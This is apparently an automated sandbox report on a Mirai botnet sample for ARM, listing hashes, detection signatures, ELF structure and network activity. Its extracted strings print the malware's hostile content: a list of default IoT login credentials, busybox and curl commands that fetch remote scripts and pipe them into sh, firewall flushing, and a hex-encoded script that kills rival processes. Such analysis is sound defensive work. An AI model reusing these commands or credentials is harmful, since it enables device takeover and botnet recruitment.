Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name:la.bot.arm7.elf
Analysis ID:1584246
MD5:a2d5aaf47272d77edb8d3a64ec4f5950
SHA1:bc7e0d66d5caaaadc3c1eff2c545c2e740211b77
SHA256:6ef5eb1aa43924d6ba67ef4133c140af11562daf17119c2b905b096e8dbee306
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584246
Start date and time:2025-01-04 23:57:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm7.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@2/0
  • VT rate limit hit for: la.bot.arm7.elf
Command:/tmp/la.bot.arm7.elf
PID:5433
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • la.bot.arm7.elf (PID: 5433, Parent: 5358, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/la.bot.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
la.bot.arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5433.1.00007f0b34017000.00007f0b34034000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: la.bot.arm7.elfReversingLabs: Detection: 31%
      Source: la.bot.arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
      Source: /tmp/la.bot.arm7.elf (PID: 5433)Socket: 127.0.0.1:43478Jump to behavior
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: la.bot.arm7.elfString found in binary or memory: http:///curl.sh
      Source: la.bot.arm7.elfString found in binary or memory: http:///wget.sh
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
      Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o-
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal56.troj.linELF@0/0@2/0
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/11/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/22/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/55/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/66/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/88/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/99/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/111/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/222/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/333/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/777/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/888/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/11111/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)File opened: /proc/999/mapsJump to behavior
      Source: /tmp/la.bot.arm7.elf (PID: 5433)Queries kernel information via 'uname': Jump to behavior
      Source: la.bot.arm7.elf, 5433.1.00007ffd90af5000.00007ffd90b16000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
      Source: la.bot.arm7.elf, 5433.1.000055d105d32000.000055d105e81000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
      Source: la.bot.arm7.elf, 5433.1.000055d105d32000.000055d105e81000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
      Source: la.bot.arm7.elf, 5433.1.00007ffd90af5000.00007ffd90b16000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
      Source: la.bot.arm7.elf, 5433.1.00007ffd90af5000.00007ffd90b16000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: la.bot.arm7.elf, type: SAMPLE
      Source: Yara matchFile source: 5433.1.00007f0b34017000.00007f0b34034000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: la.bot.arm7.elf, type: SAMPLE
      Source: Yara matchFile source: 5433.1.00007f0b34017000.00007f0b34034000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path InterceptionDirect Volume Access1
      OS Credential Dumping
      11
      Security Software Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      la.bot.arm7.elf32%ReversingLabsLinux.Trojan.Mirai
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      daisy.ubuntu.com
      162.213.35.25
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shla.bot.arm7.elffalse
          high
          http:///curl.shla.bot.arm7.elffalse
            high
            No contacted IP infos
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            daisy.ubuntu.comarm5.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.24
            main.arm6.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            fuckunix.arm5.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.24
            Space.arm.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            Space.sh4.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            Space.spc.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            Space.ppc.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            Space.arm5.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            Fantazy.i686.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            No context
            No context
            No context
            No created / dropped files found
            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
            Entropy (8bit):6.121007484045904
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:la.bot.arm7.elf
            File size:117'304 bytes
            MD5:a2d5aaf47272d77edb8d3a64ec4f5950
            SHA1:bc7e0d66d5caaaadc3c1eff2c545c2e740211b77
            SHA256:6ef5eb1aa43924d6ba67ef4133c140af11562daf17119c2b905b096e8dbee306
            SHA512:defec37c52ccf0980e2689096462e7b3fadcc493305fc2dfebf5bfac80dd28430c759c9d0bb557ecf5293faeb151284d74986f67310853d7d728ce18f7e8d14e
            SSDEEP:3072:ekHh+iQc1tPpr/H/QsoGDGqs/WfPafeHpH4gM7tAI6l1ZnN:ekB+iQc1tlZolWXafeHpH4gWtsV
            TLSH:FCB3F859F8819F16D5DA15BFFE4F428E33232BA8E3DF32029D146B2536CA55B0E6B401
            File Content Preview:.ELF..............(.........4...........4. ...(........p.....B...B.......................................................................t..........................................Q.td..................................-...L..................@-.,@...0....S

            ELF header

            Class:ELF32
            Data:2's complement, little endian
            Version:1 (current)
            Machine:ARM
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x8194
            Flags:0x4000002
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:5
            Section Header Offset:116704
            Section Header Size:40
            Number of Section Headers:15
            Header String Table Index:14
            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x80d40xd40x100x00x6AX004
            .textPROGBITS0x80f00xf00x18a480x00x6AX0016
            .finiPROGBITS0x20b380x18b380x100x00x6AX004
            .rodataPROGBITS0x20b480x18b480x37200x00x2A008
            .ARM.extabPROGBITS0x242680x1c2680x180x00x2A004
            .ARM.exidxARM_EXIDX0x242800x1c2800x1180x00x82AL204
            .eh_framePROGBITS0x2c3980x1c3980x40x00x3WA004
            .tbssNOBITS0x2c39c0x1c39c0x80x00x403WAT004
            .init_arrayINIT_ARRAY0x2c39c0x1c39c0x40x00x3WA004
            .fini_arrayFINI_ARRAY0x2c3a00x1c3a00x40x00x3WA004
            .gotPROGBITS0x2c3a80x1c3a80xa80x40x3WA004
            .dataPROGBITS0x2c4500x1c4500x31c0x00x3WA004
            .bssNOBITS0x2c76c0x1c76c0x70d40x00x3WA004
            .shstrtabSTRTAB0x00x1c76c0x730x00x0001
            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            EXIDX0x1c2800x242800x242800x1180x1184.50580x4R 0x4.ARM.exidx
            LOAD0x00x80000x80000x1c3980x1c3986.13520x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
            LOAD0x1c3980x2c3980x2c3980x3d40x74a84.38790x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
            TLS0x1c39c0x2c39c0x2c39c0x00x80.00000x4R 0x4.tbss
            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
            TimestampSource PortDest PortSource IPDest IP
            Jan 4, 2025 23:57:56.626643896 CET4870253192.168.2.131.1.1.1
            Jan 4, 2025 23:57:56.626643896 CET4944153192.168.2.131.1.1.1
            Jan 4, 2025 23:57:56.633466005 CET53494411.1.1.1192.168.2.13
            Jan 4, 2025 23:57:56.633725882 CET53487021.1.1.1192.168.2.13
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jan 4, 2025 23:57:56.626643896 CET192.168.2.131.1.1.10x9a3bStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
            Jan 4, 2025 23:57:56.626643896 CET192.168.2.131.1.1.10x2fb5Standard query (0)daisy.ubuntu.com28IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jan 4, 2025 23:57:56.633725882 CET1.1.1.1192.168.2.130x9a3bNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
            Jan 4, 2025 23:57:56.633725882 CET1.1.1.1192.168.2.130x9a3bNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

            System Behavior

            Start time (UTC):22:57:53
            Start date (UTC):04/01/2025
            Path:/tmp/la.bot.arm7.elf
            Arguments:/tmp/la.bot.arm7.elf
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1